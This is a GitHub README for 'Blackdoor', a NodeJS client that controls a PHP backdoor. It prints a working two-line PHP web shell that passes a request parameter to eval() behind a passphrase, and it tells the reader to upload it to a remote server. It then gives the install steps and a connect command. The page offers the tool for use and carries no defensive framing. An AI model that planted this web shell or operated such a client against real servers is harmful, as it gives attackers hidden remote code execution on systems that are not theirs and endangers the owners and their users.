Skip to content

Latest commit

 

History

History
34 lines (22 loc) · 744 Bytes

README.md

File metadata and controls

34 lines (22 loc) · 744 Bytes

Blackdoor logo

Blackdoor is an NodeJS client for a simple eval() backdoor in PHP.

Screenshots

How to use

First, upload a PHP backdoor on remote server, like this:

if(isset($_REQUEST['c']) && $_REQUEST['p'] == 'your-passphrase')
eval($_REQUEST['c']);

Locally, clone this project and install the dependencies:

git clone https://github.com/camillebaronnet/blackdoor.git
cd blackdoor
npm install

Now, you can connect:

./blackdoor.js -u http://exemple.com/backdoor.php -p your-passphrase

Existing commands

All commands are available here : commands/